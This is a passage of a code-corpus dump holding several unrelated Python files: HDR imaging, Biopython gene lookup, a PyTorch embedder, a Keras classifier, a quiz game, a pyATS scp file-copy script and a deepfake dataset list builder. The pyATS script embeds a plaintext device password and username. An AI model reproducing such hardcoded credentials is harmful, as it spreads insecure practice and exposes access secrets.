'Complete', length = 50)\n return np.array(img_rad_map,dtype=np.complex)\n\n\n\ndef globalToneMapping(image, gamma):\n \"\"\"Global tone mapping using gamma correction\n ----------\n images : \n Image needed to be corrected\n gamma : floating number\n The number for gamma correction. Higher value for brighter result; lower for darker\n Returns\n -------\n numpy.ndarray\n The resulting image after gamma correction\n \"\"\"\n # image_corrected = cv2.pow(image/255., 1.0/gamma)\n image_corrected = np.abs(np.power(image/255., 1.0/gamma))\n return image_corrected\n\n\ndef intensityAdjustment(image, template):\n \"\"\"Tune image intensity based on template\n ----------\n images : \n image needed to be adjusted\n template : \n Typically we use the middle image from image stack. We want to match the image\n intensity for each channel to template's\n Returns\n -------\n numpy.ndarray\n The resulting image after intensity adjustment\n \"\"\"\n m, n = image.shape\n channel =1\n output = np.zeros((m, n, channel))\n for ch in range(channel):\n image_avg, template_avg = np.average(image[:, :, ch]), np.average(template[:, :, ch])\n output[..., ch] = image[..., ch] * (template_avg / image_avg)\n\n return output\n\n\ndef computeHDR(images, log_exposure_times, smoothing_lambda=100., gamma=1.6):\n \"\"\"Computational pipeline to produce the HDR images\n ----------\n images : list\n A list containing an exposure stack of images\n log_exposure_times : numpy.ndarray\n The log exposure times for each image in the exposure stack\n smoothing_lambda : np.int (Optional)\n A constant value to correct for scale differences between\n data and smoothing terms in the constraint matrix -- source\n paper suggests a value of 100.\n Returns\n -------\n numpy.ndarray\n The resulting HDR with intensities scaled to fit uint8 range\n \"\"\"\n\n num_channels = 1\n hdr_image = np.zeros(images[0].shape, dtype=np.float64)\n\n layer_stack = [img[:, :] for img in images]\n intensity_samples = sampleIntensities(layer_stack)\n response_curve = computeResponseCurve(intensity_samples, log_exposure_times, smoothing_lambda, linearWeight)\n\n # img_shape = layer_stack[0].shape\n # img_rad_map = np.zeros(img_shape, dtype=np.float64)\n # inputs = range(img_shape[0])\n \n\n # num_cores = multiprocessing.cpu_count()\n\n # img_rad_map_par = Parallel(n_jobs=num_cores)(delayed(r_c_parallel)(i,layer_stack, log_exposure_times, response_curve, linearWeight) for i in inputs)\n # print(img_rad_map_par)\n # img_rad_map_par = r_c_parallel(inputs,layer_stack, log_exposure_times, response_curve, linearWeight)\n\n\n img_rad_map = computeRadianceMap(layer_stack, log_exposure_times, response_curve, linearWeight)\n img_rad_map = img_rad_map*(255./np.max(img_rad_map))\n image_mapped = globalToneMapping(img_rad_map, gamma)\n return image_mapped\n\n # for channel in range(num_channels):\n # # Collect the current layer of each input image from the exposure stack\n # layer_stack = [img[:, :, channel] for img in images]\n\n # # Sample image intensities\n # intensity_samples = sampleIntensities(layer_stack)\n\n # # Compute Response Curve\n # response_curve = computeResponseCurve(intensity_samples, log_exposure_times, smoothing_lambda, linearWeight)\n\n # # Build radiance map\n # img_rad_map = computeRadianceMap(layer_stack, log_exposure_times, response_curve, linearWeight)\n\n # # Normalize hdr layer to (0, 255)\n # hdr_image[..., channel] = cv2.normalize(img_rad_map, alpha=0, beta=255, norm_type=cv2.NORM_MINMAX)\n\n # # Global tone mapping\n # image_mapped = globalToneMapping(hdr_image, gamma)\n\n # # Adjust image intensity based on the middle image from image stack\n # template = images[len(images)//2]\n # image_tuned = intensityAdjustment(image_mapped, template)\n\n # # Output image\n # # output = cv2.normalize(image_tuned, alpha=0, beta=255, norm_type=cv2.NORM_MINMAX)\n # # output = cv2.normalize(image_mapped, alpha=0, beta=255, norm_type=cv2.NORM_MINMAX)\n # return output.astype(np.uint8)\n\ndef window(seq, n=2):\n \"Returns a sliding window (of width n) over data from the iterable\"\n \" s -> (s0,s1,...s[n-1]), (s1,s2,...,sn), ... \"\n it = iter(seq)\n result = tuple(islice(it, n))\n if len(result) == n:\n yield result\n for elem in it:\n result = result[1:] + (elem,)\n yield result\n\ndef MakeHDR(window,numero):\n images = []\n exp_times = []\n folder1 = 'pelicula_msngf2_hdr_cm1-parallelized/'\n # folder2 = 'pelicula_msngf2_hdr_cm2/'\n print(\"Making windows number %i\"%numero)\n for item in window:\n # print('Reading image %s'%item[-1])\n f = 'pelicula_sun_msngf2/'+item[-1]\n # f = 'pelicula_ima_aug26/'+item[-1]\n im_t = np.flipud(matplotlib.image.imread(f))\n wd,h = im_t.shape[0],im_t.shape[1]\n imgs = np.array(rgb2gray(im_t[int(wd/2)-1500:int(wd/2)+1500,int(h/2)-1500:int(h/2)+1500]),dtype=np.uint8)\n # imgs = np.array(denoise_tv_chambolle(im_gs, weight=0., multichannel=False),dtype=np.uint8)\n images.append(imgs)\n del f,im_t,wd,h,imgs#,im_gs\n exp_times.append(float(item[-2]))\n img_hdr = computeHDR(images,np.log(exp_times))\n img_hdr = np.array((255/np.max(img_hdr))*img_hdr,dtype=np.float64)\n matplotlib.image.imsave(folder1+'%i.jpg'%numero,img_hdr,cmap='gray_r',origin='lower',dpi=900)\n # matplotlib.image.imsave(folder2+'%i.jpg'%idx,img_hdr,cmap='PuOr_r',origin='lower',dpi=900)\n del img_hdr\n\n\nif __name__ == '__main__':\n metadata = np.load('metadata_aug26.npy')\n n = 20\n windows = []\n for each in window(metadata[1:],n):\n windows.append(list(each))\n pool = mp.Pool(processes=12)\n try:\n jobs = [pool.apply_async(MakeHDR, args=(ventana, numero)) for numero,ventana in enumerate(windows)]\n results = [r.get() for r in jobs] # This line actually runs the jobs\n pool.close()\n pool.join()\n # re-raise the rest\n except Exception:\n print(\"Exception in worker:\")\n # traceback.print_exc()\n raise\n # metadata_ch = chunkIt(metadata[1:],n)\n # for idx,chun in enumerate(metadata_ch):\n # images = []\n # exp_times = []\n # print('Making chunk %i'%idx)\n # for item in chun:\n # print('Reading image %s'%item[-1])\n # f = 'pelicula_sun_msngf2/'+item[-1]\n # # f = 'pelicula_ima_aug26/'+item[-1]\n # im_t = np.flipud(matplotlib.image.imread(f))\n # wd,h = im_t.shape[0],im_t.shape[1]\n # imgs = np.array(rgb2gray(im_t[int(wd/2)-1500:int(wd/2)+1500,int(h/2)-1500:int(h/2)+1500]),dtype=np.uint8)\n # # imgs = np.array(denoise_tv_chambolle(im_gs, weight=0., multichannel=False),dtype=np.uint8)\n # images.append(imgs)\n # del f,im_t,wd,h,imgs#,im_gs\n # exp_times.append(float(item[-2]))\n # img_hdr = computeHDR(images,np.log(exp_times))\n # img_hdr = np.array((255/np.max(img_hdr))*img_hdr,dtype=np.float64)\n # matplotlib.image.imsave(folder1+'%i.jpg'%idx,img_hdr,cmap='gray_r',origin='lower',dpi=900)\n # matplotlib.image.imsave(folder2+'%i.jpg'%idx,img_hdr,cmap='PuOr_r',origin='lower',dpi=900)\n # del img_hdr\n # plt.imshow(img_hdr,cmap='viridis',origin='lower')\n # plt.show()\n # n = 21\n # images = []\n # exp_times = []\n # print('Reading images')\n # for item in metadata[1:n]:\n # print('Reading image %s'%item[-1])\n # f = 'pelicula_sun_msngf2/'+item[-1]\n # # f = 'pelicula_ima_aug26/'+item[-1]\n # im_t = np.flipud(matplotlib.image.imread(f))\n # wd,h = im_t.shape[0],im_t.shape[1]\n # imgs = np.array(rgb2gray(im_t[int(wd/2)-1500:int(wd/2)+1500,int(h/2)-1500:int(h/2)+1500]),dtype=np.uint8)\n # # imgs = np.array(denoise_tv_chambolle(im_gs, weight=0., multichannel=False),dtype=np.uint8)\n # images.append(imgs)\n # del f,im_t,wd,h,imgs#,im_gs\n # exp_times.append(float(item[-2]))\n # img_hdr = computeHDR(images,np.log(exp_times))\n # img_hdr = np.array(img_hdr,dtype=np.float64)\n # matplotlib.image.imsave('HDR_test_denoise_gnf.jpg',img_hdr,dpi=600)\n # plt.imshow(img_hdr,cmap='viridis',origin='lower')\n # plt.show()","sub_path":"hdr_aug27_multi.py","file_name":"hdr_aug27_multi.py","file_ext":"py","file_size_in_byte":17881,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"353516925","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Nov 27 11:04:57 2019\n\n@author: Bia\n\"\"\"\n\n\nimport os\nfrom Bio import SeqIO\nfrom Bio import Entrez\nfrom Bio.Blast import NCBIWWW\nfrom Bio.Blast import NCBIXML\n\n\n\ndef gene(nr):\n if nr == 'NG_046988.1':\n filename = 'E2F1.gb'\n elif nr == 'NG_012306.1':\n filename = 'IRF5.gb'\n else:\n return False\n Entrez.email = \"...@example.com\"\n if not os.path.isfile(filename):\n handle = Entrez.efetch(db=\"nucleotide\", id=nr, rettype='gb', retmode=\"text\") \n save_gene = open(filename,'w') \n save_gene.write(handle.read())\n save_gene.close()\n handle.close() \n record = SeqIO.read(filename,'genbank') \n return record\n\n\ndef get_prot(nr):\n featcds = [ ]\n for i in range(len(gene(nr).features)):\n if gene(nr).features[i].type == \"CDS\":\n featcds.append(i)\n if nr == 'NG_046988.1': #E2F1\n for k in featcds:\n if gene(nr).features[k].qualifiers['product'][0] == 'transcription factor E2F1':\n seq_prot = gene(nr).features[k].qualifiers['translation'][0]\n prot_id = gene(nr).features[k].qualifiers['protein_id'][0]\n proteína = {'Id da proteína':prot_id,'Sequência da proteína':seq_prot}\n elif nr == 'NG_012306.1': #IRF5\n for k in featcds:\n if gene(nr).features[k].qualifiers['product'][0] == 'interferon regulatory factor 5 isoform d':\n seq_prot = gene(nr).features[k].qualifiers['translation'][0]\n prot_id = gene(nr).features[k].qualifiers['protein_id'][0]\n proteína = {'Id da proteína':prot_id,'Sequência da proteína':seq_prot}\n return proteína\n\n\ndef literatura_gene():\n terms = ['IRF5 protein levels significantly lower in non-small cell lung cancer',\n 'Clinical Significance of transcription factor E2F1 in Non-Small Cell Lung Cancer',\n 'E2F1 IRF5 lung cancer']\n ids = []\n for cit in terms:\n Entrez.email = \"...@example.com\"\n handle = Entrez.esearch(db='pubmed',term=cit)\n record = Entrez.read(handle)\n handle.close()\n ids.append(record['IdList'])\n out_handle = Entrez.efetch(db='pubmed', id=str(ids), rettype='abstract', retmode='text')\n out_record = out_handle.read()\n out_handle.close()\n return out_record\n\n\ndef blast(nr):\n if nr == 'NG_046988.1':\n filename = 'E2F1_blast.xml'\n elif nr == 'NG_012306.1':\n filename = 'IRF5_blast.xml'\n if not os.path.isfile(filename):\n my_prot = get_prot(nr)['Sequência da proteína']\n handle = NCBIWWW.qblast('blastp','swissprot',my_prot, \n url_base='https://blast.ncbi.nlm.nih.gov/Blast.cgi', auto_format=None, \n composition_based_statistics=None, db_genetic_code=None, endpoints=None, \n entrez_query='(none)', expect=0.04, filter=None, gapcosts=None, genetic_code=None, \n hitlist_size=15, i_thresh=None, layout=None, lcase_mask=None, matrix_name='BLOSUM62', \n nucl_penalty=None, nucl_reward=None, other_advanced=None, perc_ident=None, \n phi_pattern=None, query_file=None, query_believe_defline=None, query_from=None, \n query_to=None, searchsp_eff=None, service=None, threshold=None, ungapped_alignment=None, \n word_size=None, short_query=None, alignments=10, alignment_view=None, descriptions=10, \n entrez_links_new_window=None, expect_low=None, expect_high=None, format_entrez_query=None, \n format_object=None, format_type='XML', ncbi_gi=None, results_file=None, show_overview=None, \n megablast=None, template_type=None, template_length=None)\n save_file = open(filename,'w')\n save_file.write(handle.read())\n save_file.close()\n handle.close() \n result = open(filename)\n records = NCBIXML.parse(result) \n return records\n\n\ndef mega(nr):\n acessions = []\n for blast_record in blast(nr):\n for alignment in blast_record.alignments:\n acessions.append(alignment.title[3:11])\n if nr == 'NG_046988.1':\n filename = 'E2F1_homologas.fasta'\n elif nr == 'NG_012306.1':\n filename = 'IRF5_homologas.fasta'\n else:\n return False\n Entrez.email = \"...@example.com\"\n if not os.path.isfile(filename):\n handle = Entrez.efetch(db=\"protein\", id=acessions, rettype='fasta', retmode=\"text\") \n save_gene = open(filename,'w') \n save_gene.write(handle.read())\n save_gene.close()\n handle.close() \n record = SeqIO.parse(filename,'fasta') \n return record #ficheiro fasta com as sequências homólogas do nosso gene para utilizar no MEGA\n\n\ndef test():\n while True: \n g = input(\"\"\"\n [1] Analisar o gene E2F1\n [2] Analisar o gene IRF5\n [3] Fechar o programa\n \n Escolha uma opção: \"\"\")\n if g == '1':\n nr = 'NG_046988.1'\n elif g == '2':\n nr = 'NG_012306.1'\n elif g == '3':\n print(\"\"\"\n O programa acabou! Obrigada!\"\"\")\n break\n else:\n print(\"\"\"\n Tente outra vez! Escolha apenas 1, 2 ou 3!\"\"\")\n test()\n while True:\n menu = input(\"\"\"\n [1] Análise de literatura\n [2] Análise da sequência e das features presentes no NCBI\n [3] Análise de homologias por BLAST\n [4] Seleciona outro gene para analisar\n \n Escolha uma opção: \"\"\")\n if menu == \"1\":\n print(' ')\n print('Artigos sobre os genes: '+'\\n',literatura_gene())\n elif menu == \"2\":\n while True:\n escolha = input(\"\"\"\n [A] Obter os ficheiros correspondentes ao gene\n [B] Verificar as anotações correspondentes ao gene \n [C] Verificar e analisar a informação da lista de features e seus qualifiers\n [E] Voltar ao menu anterior\n \n Escolha uma opção: \"\"\")\n if escolha in 'Aa':\n print('\\n'+'Sequência propriamente dita:'+'\\n',gene(nr).seq +'\\n')\n print('Tamanho da respetiva sequência de DNA:',len(gene(nr).seq))\n print('\\n'+'Identificador da sequência:',gene(nr).id + '\\n')\n print('Nome da sequência:',gene(nr).name + '\\n')\n print('Descrição:',gene(nr).description + '\\n')\n print('Número de anotações:',len(gene(nr).annotations))\n print('\\n'+'Proveniência:',gene(nr).annotations[\"source\"] +'\\n')\n print('Referências a bases de dados externas:',gene(nr).dbxrefs)\n print('\\n'+'Número de features:',len(gene(nr).features))\n elif escolha in 'Bb':\n print(' ')\n for key in gene(nr).annotations:\n print('\\n'+key + ':',gene(nr).annotations[key])\n elif escolha in 'Cc':\n print(' ')\n i=0\n for feat in gene(nr).features:\n i+=1\n print('\\n'+'***FEATURE '+str(i)+'***'+'\\n')\n print('Type:',feat.type)\n print('\\n'+'Location:',feat.location)\n print('\\n'+'Subsequência correspondente à feature:',feat.extract(gene(nr).seq)+'\\n')\n print('Qualifiers da feature: '+'\\n')\n for key in feat.qualifiers:\n print(key+': ')\n for value in feat.qualifiers[key]:\n print(value+'\\n')\n r = input(\"\"\"Obter apenas as sequências codificantes (CDS) e a proteína respetivamente codificada \n \n [S] Sim\n [N] Não\n \n Escolha uma opção: \"\"\")\n if r in 'Ss':\n for feat in gene(nr).features:\n if feat.type == \"CDS\":\n print('\\n'+'***FEATURE CDS***')\n print('\\n'+'Location: ',feat.location)\n print('\\n'+'Sub-sequência afetada pela feature: ',feat.extract(gene(nr).seq))\n print('\\n'+'Proteína codificada: ', \n feat.qualifiers['product'][0]+'\\n',\n '\\n'+'Sequência da proteína: ',\n feat.qualifiers['translation'][0]+'\\n',\n '\\n'+'Id da proteína: ', \n feat.qualifiers['protein_id'][0]+'\\n')\n elif escolha in \"Ee\":\n print('''\n Voltou ao menu anterior.''')\n break\n else:\n print('''\n Erro! Não selecionou corretamente nenhuma das opções. Tente novamente.''')\n elif menu == \"3\":\n print('\\n'+'BLAST RESULTS...loading...'+'\\n')\n i = 0\n for blast_record in blast(nr):\n for alignment in blast_record.alignments:\n for hsp in alignment.hsps:\n i += 1\n print('\\n'+'**** ALIGNMENT '+str(i)+' ****'+'\\n')\n print('sequence description:', alignment.title)\n print('\\n'+'length:', alignment.length)\n print('\\n'+'e-value:', hsp.expect)\n print('\\n'+'score:',hsp.score)\n print('\\n'+'percent identity (%):',(hsp.identities)*100/len(hsp.query))\n print('\\n'+'query: '+hsp.query[0:75] + \"...\")\n print('match: '+hsp.match[0:75] + \"...\")\n print('sbjct: '+hsp.sbjct[0:75] + \"...\"+'\\n')\n mega(nr)\n elif menu == \"4\":\n print('''\n Escolha outro gene a analisar.''')\n \n break\n else:\n print('''\n Erro! Não selecionou corretamente nenhuma das opções. Tente novamente.''')\n \n \nif __name__ == \"__main__\":\n test()\n \n ","sub_path":"code.py","file_name":"code.py","file_ext":"py","file_size_in_byte":10477,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"81754417","text":"\"\"\"Module containing the embedders.\"\"\"\r\n\r\nimport torch\r\nimport torch.nn as nn\r\nimport torch.nn.functional as F\r\n\r\nfrom scipy.stats import truncnorm\r\nfrom torch.nn.parameter import Parameter\r\n\r\nfrom utils.helpers import get_device\r\n\r\n\r\nclass Embedder(nn.Module):\r\n def __init__(self, n_tokens, latent_dim, dt=1.0, weighted=True):\r\n \"\"\"Token embedder.\r\n\r\n Parameters\r\n ----------\r\n n_tokens: int\r\n Number of tokens in vocabulary\r\n\r\n latent_dim: int\r\n Dimensionality of latent embedding.\r\n\r\n dt: float\r\n Time increment between sequence steps.\r\n\r\n weighted: bool\r\n Whether or not to add embedding weights.\r\n \"\"\"\r\n super(Embedder, self).__init__()\r\n\r\n self.n_tokens = n_tokens\r\n self.latent_dim = latent_dim\r\n self.dt = dt\r\n self.weighted = weighted\r\n\r\n self.device = get_device()\r\n\r\n self.embedX = Embedding(n_tokens+1, latent_dim, padding_idx=0)\r\n if self.weighted:\r\n self.embedW = Embedding(n_tokens+1, 1)\r\n self.softmax = nn.Softmax(dim=1)\r\n\r\n def forward(self, X):\r\n T = X[:, :, 0]\r\n X = X[:, :, 1].long()\r\n\r\n # Remove excess in time dimension\r\n t_max = T.max()\r\n n = (T < t_max).sum(dim=1).max()\r\n T = T[:, :n]\r\n X = X[:, :n]\r\n\r\n # Embed tokens\r\n embedded = self.embedX(X)\r\n\r\n # Extract token weights (and keep them positive)\r\n if self.weighted:\r\n w = self.embedW(X)\r\n w = torch.exp(w)\r\n\r\n # Step through sequence\r\n output = []\r\n for t in torch.arange(\r\n 0, t_max, self.dt, dtype=torch.float32).to(self.device):\r\n t_idx = ((t <= T) & (T < t+1)).float().unsqueeze(2)\r\n counts = t_idx.sum(dim=1, keepdim=True)\r\n\r\n if self.weighted:\r\n w_t = t_idx * w\r\n X_t = w_t * embedded\r\n else:\r\n X_t = t_idx * embedded\r\n\r\n X_t_avg = X_t.sum(dim=1, keepdim=True) / (counts + 1e-6)\r\n output += [X_t_avg]\r\n\r\n output = torch.cat(output, dim=1)\r\n\r\n return output\r\n\r\n\r\n# HELPERS\r\nclass Embedding(nn.Module):\r\n def __init__(self, n_tokens, latent_dim,\r\n padding_idx=None, init='truncnorm'):\r\n super(Embedding, self).__init__()\r\n self.n_tokens = n_tokens\r\n self.latent_dim = latent_dim\r\n if padding_idx is not None:\r\n if padding_idx > 0:\r\n assert padding_idx < self.n_tokens, \\\r\n 'padding_idx must be within n_tokens'\r\n elif padding_idx < 0:\r\n assert padding_idx >= -self.n_tokens, \\\r\n 'padding_idx must be within n_tokens'\r\n self.padding_idx = padding_idx\r\n self.init = init\r\n\r\n self.reset_parameters()\r\n\r\n def reset_parameters(self):\r\n with torch.no_grad():\r\n if self.init == 'truncnorm':\r\n t = 1. / (self.n_tokens ** (1 / 2))\r\n weights = truncnorm.rvs(\r\n -t, t, size=[self.n_tokens, self.latent_dim])\r\n self.weights = Parameter(torch.tensor(weights).float())\r\n elif self.init == 'zeros':\r\n self.weights = Parameter(\r\n torch.Tensor(self.n_tokens, self.latent_dim))\r\n self.weights.fill_(1.0)\r\n\r\n if self.padding_idx is not None:\r\n with torch.no_grad():\r\n self.weights[self.padding_idx].zero_()\r\n\r\n def forward(self, x):\r\n x = F.embedding(x, self.weights, padding_idx=self.padding_idx)\r\n\r\n return x\r\n","sub_path":"flexehr/models/embedders.py","file_name":"embedders.py","file_ext":"py","file_size_in_byte":3675,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"312728343","text":"import csv\r\nimport matplotlib.pyplot as plt\r\nimport tensorflow as tf\r\nimport numpy as np\r\nfrom scipy.spatial.distance import cdist\r\nfrom tensorflow.python.keras.models import Sequential\r\nfrom tensorflow.python.keras.layers import Dense, GRU, Embedding, Flatten\r\nfrom tensorflow.python.keras.optimizers import Adam\r\n#from tensorflow.python.keras.utils import to_categorical\r\nfrom tensorflow.python.keras.preprocessing.text import Tokenizer\r\nfrom tensorflow.python.keras.preprocessing.sequence import pad_sequences\r\nfrom tensorflow.python.keras import backend as K\r\n\r\n\r\ntf.compat.v1.disable_eager_execution()\r\n\r\nx_train_text = []\r\ny_train = []\r\nx_test_text = []\r\ny_test = []\r\n\r\nwith open('combinetrainset.csv') as csvfile:\r\n readCSV = csv.reader(csvfile, delimiter=',')\r\n for row in readCSV: \r\n x_train_text.append(row[0])\r\n y_train.append(float(row[3]))\r\n\r\nwith open('combinetestset.csv') as csvfile:\r\n readCSV = csv.reader(csvfile, delimiter=',')\r\n for row in readCSV:\r\n x_test_text.append(row[0])\r\n y_test.append(float(row[3]))\r\n \r\none_hot_labels = tf.keras.utils.to_categorical(y_train, num_classes=3) # remember to change num classes to reflect number of error types vhl\r\ntwo_hot_labels = tf.keras.utils.to_categorical(y_test, num_classes=3) # num classes is number of errors\r\ndata_text = x_train_text + x_test_text\r\n\r\nnum_words=10000\r\ntokenizer = Tokenizer(num_words=num_words)\r\n\r\ntokenizer.fit_on_texts(data_text)\r\n\r\nx_train_tokens = tokenizer.texts_to_sequences(x_train_text)\r\nx_test_tokens = tokenizer.texts_to_sequences(x_test_text)\r\n\r\nnum_tokens = [len(tokens) for tokens in x_train_tokens + x_test_tokens]\r\nnum_tokens = np.array(num_tokens)\r\n\r\nmax_tokens = np.max(num_tokens)\r\nmax_tokens = int(max_tokens)\r\n\r\npad = 'pre'\r\n\r\nx_train_pad = pad_sequences(x_train_tokens, maxlen=max_tokens,\r\n padding=pad, truncating=pad)\r\nx_test_pad = pad_sequences(x_test_tokens, maxlen=max_tokens,\r\n padding=pad, truncating=pad)\r\n\r\n\r\nidx = tokenizer.word_index\r\ninverse_map = dict(zip(idx.values(), idx.keys()))\r\n\r\ndef tokens_to_string(tokens):\r\n # Map from tokens back to words.\r\n words = [inverse_map[token] for token in tokens if token != 0]\r\n \r\n # Concatenate all words.\r\n text = \" \".join(words)\r\n\r\n return text\r\n\r\nmodel = Sequential()\r\n\r\n\r\n\r\nembedding_size = 8\r\n\r\nmodel.add(Embedding(input_dim=num_words,\r\n output_dim=embedding_size,\r\n input_length=max_tokens,\r\n name='layer_embedding'))\r\n\r\nmodel.add(GRU(units=16, return_sequences=True))\r\nmodel.add(GRU(units=8, return_sequences=True))\r\nmodel.add(GRU(units=4))\r\n\r\n# the first parameter corresponds to number of target\r\nmodel.add(Dense(3, activation='softmax')) # changed ativation to softmax and first parameter from one to 2 vhl\r\noptimizer = Adam(lr=1e-3)\r\n\r\nmodel.compile(loss='categorical_crossentropy',\r\n optimizer=optimizer,\r\n metrics=['accuracy']) # changed loss to categorical_crossentropy\r\n\r\n#model.fit(x_train_pad, y_train, validation_split=0.05, epochs=3, batch_size=32)\r\nmodel.fit(x_train_pad, one_hot_labels, validation_split=0.05, epochs=3, batch_size=32) # replaced y_train with one_hot_labels \r\nresult = model.evaluate(x_test_pad, np.array(two_hot_labels)) # replaced y_test with two_hot_abels\r\n\r\nprint(\"Accuracy: {0:.2%}\".format(result[1]))\r\nprint(\"-----------------------------------------------------\")\r\n\r\ny_pred = model.predict(x=x_test_pad[0:1000])\r\ny_pred = y_pred.T[0]\r\n\r\ncls_pred = np.array([1.0 if p>0.5 else 0.0 for p in y_pred])\r\ncls_true = np.array(y_test[0:1000])\r\n\r\nincorrect = np.where(cls_pred != cls_true)\r\nidx = incorrect[0]\r\nprint(idx)\r\n \r\n\r\n\r\n\r\n\r\n \r\n","sub_path":"error-detection-neural-nets-master/Neural Network.py","file_name":"Neural Network.py","file_ext":"py","file_size_in_byte":3753,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"219122365","text":"from PIL import Image\n\n# creating an empty list where we going to store all the personality choices\npersonality_choices = []\n# asking a user for her/his name and greeting\nname = input(\"What is your name? (please print your name):\\n\")\nprint(\"Hi {}! Nice to meet you!\".format(name))\n# asking if the user wants to play\nanswer = input(\"This small Python program will show you \\nwhat tree you could be according to your features.\\nWould \"\n \"you like to play?\\n(print yes/no)\\n\")\n\n\ndef bye():\n # this function will be used if the user doesn't want to play\n # it will finish the game and show a funny picture of the baobab\n print(\"Oh, {}, you are such a baobab!\".format(name))\n image = Image.open('baobab.jpg')\n image.show()\n\n\ndef yes_or_no_answer_only():\n # this function called if user put anything else as input when he/she needs to answer \"yes\" or \"no\" only\n # it will ask if the user wants to try again and if yes, redirect to the first answer\n print(\"Please answer 'yes' or 'no'.\")\n try_again = str(input(\"Would you like to try again?\\n\"))\n game_start_question1()\n\n\ndef value_error_numbers():\n # this function is called if the user put str or number larger than 3 as answer and asks if the user wants to try\n # again. If the answer is \"yes\" it redirect to the first question and to \"buy\" function if \"no\"\n ve_answer = str(input(\"You should've choose a number 1-3 to the previous question.\\nWould you like to try again? (\"\n \"print yes/no)\"))\n if ve_answer == \"yes\":\n game_start_question1()\n else:\n bye()\n\n\ndef game_start_question1():\n # The start of the game and the first question about the height of the person\n # if the user put wrong number, out of range or a str as the answer, this function redirects to value_error_numbers\n print(\"Okay, let's start!\")\n print(\"Please choose (a number) which of those suits you best: \")\n try:\n height = int(input(\"I am: \\n1.Tall \\n2.Average height \\n3.Small\\n\"))\n if height == 1 or height == 2 or height == 3:\n personality_choices.append(height)\n else:\n value_error_numbers()\n except ValueError:\n value_error_numbers()\n\n\ndef question2():\n print(\"Which quality suits you personality better? (choose one number only): \")\n try:\n personality = int(input(\"1.Tough\\n2.Easygoing\\n3.Both, depends on situation.\\n\"))\n personality_choices.append(personality)\n question3()\n except ValueError:\n value_error_numbers()\n\n\ndef question3():\n print(\"Which season is you favorite? (choose one number only):\\n\")\n try:\n weather_choice = int(input(\"1.Winter\\n2.Spring\\n3.Summer\\n4.Autumn\\n\"))\n personality_choices.append(weather_choice)\n question4()\n except ValueError:\n value_error_numbers()\n\n\ndef question4():\n print(\"What is the length of your hair? (choose one number):\\n\")\n try:\n haircut = int(input(\"1.Bold\\n2.Short hair\\n3.Shoulder-length\\n4.Long\\n\"))\n personality_choices.append(haircut)\n print(personality_choices)\n except ValueError:\n value_error_numbers()\n\n\nif answer.lower() == \"yes\":\n game_start_question1()\n question2()\n\nelif answer.lower() == \"no\":\n bye()\nelse:\n yes_or_no_answer_only()\n\n\n\n\n\n\n\n\n\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3315,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"168492544","text":"from ats.topology import loader\nfrom ats import topology\nfrom ats.utils.fileutils import FileUtils\n\n# Transferring a single file to or from a remote server\n\n\ntb = loader.load(\"testbed.yaml\")\n\n# Instanciate a filetransferutils instance for the device corresponding\n# to the device specific OS\nthis_device = FileUtils.from_device(tb.devices['my_device'])\n\n# copy from remote to local machine\nthis_device.copyfile(source='scp://remote_server:/tmp/demo.txt',\n destination='/Users/vkozin/Downloads/',\n timeout_seconds=15)\n\n# copy from local to remote machine\nthis_device.copyfile(source='/Users/vkozin/Downloads/Task_1.docx',\n destination='scp://remote_server:/tmp/',\n timeout_seconds=15)\n\n# loading testbed immediately\ntb = topology.loader.load('''\ndevices:\n remote_device:\n os: 'linux'\n tacacs:\n username: vkozin\n passwords:\n linux: '159753852'\n connections:\n linux:\n protocol: ssh\n ip: 192.168.242.44\n type: 'linux'\n''')\n\n# input data in remote file\nstring_configuration = 'data for script'\n\ndevice = tb.devices['remote_device']\n\ndevice.connect()\ndevice.execute('cd /tmp')\ndevice.execute(\"echo '{}' > demo.txt\".format(string_configuration))\n","sub_path":"case_3/data_copy_example.py","file_name":"data_copy_example.py","file_ext":"py","file_size_in_byte":1310,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"558055476","text":"import random\nimport os\n\ndata_dir = \"/home-hd-1/gpu/Workspace/Datas/dataset/Celeb-DF-v2/\"\ntest_file_list_path = os.path.join(data_dir, 'List_of_testing_videos.txt')\ndomain_label = 1\nwith open(test_file_list_path) as f:\n lines = f.readlines()\n test_fn = {}\n for line in lines:\n label, v_path = line.split(' ')\n v_path = v_path[:-1]\n fn = os.path.basename(v_path).split('.')[0]\n dirn = os.path.dirname(v_path)\n if dirn not in test_fn:\n test_fn[dirn] = [fn]\n else:\n test_fn[dirn].append(fn)\nimg_lists = {}\nfor video_dir in test_fn.keys():\n test_list = test_fn[video_dir]\n train_img_path_list = []\n test_img_path_list = []\n faces_dir = os.path.join(data_dir, video_dir + '_faces')\n for img_dir in os.listdir(faces_dir):\n if img_dir in test_list:\n img_path = os.path.join(faces_dir, img_dir)\n for img_fn in os.listdir(img_path):\n test_img_path_list.append(os.path.join(img_path, img_fn))\n else:\n img_path = os.path.join(faces_dir, img_dir)\n for img_fn in os.listdir(img_path):\n train_img_path_list.append(os.path.join(img_path, img_fn))\n img_lists[video_dir] = {'train': train_img_path_list, 'test': test_img_path_list}\n\ntrain_str_list = []\ntest_str_list = []\n\nfor k in img_lists:\n label = 1\n if 'real' in k:\n label = 0\n for ke in img_lists[k]:\n print('{}_{}: {}'.format(k, ke, len(img_lists[k][ke])))\n output_path = os.path.join(data_dir, '{}_{}.txt'.format(k, ke))\n output_str = ''\n for p in img_lists[k][ke]:\n tmp_str = '{},{},{}\\n'.format(p, label, domain_label)\n output_str += tmp_str\n if ke == 'train':\n train_str_list.append(tmp_str)\n else:\n test_str_list.append(tmp_str)\n with open(output_path, 'w', encoding='utf-8') as f:\n f.write(output_str)\ntrain_file_path = os.path.join(data_dir, 'train.txt')\ntest_file_path = os.path.join(data_dir, 'test.txt')\nprint('train: {}'.format(len(train_str_list)))\nprint('test: {}'.format(len(test_str_list)))\nwith open(train_file_path, 'w', encoding='utf-8') as f:\n 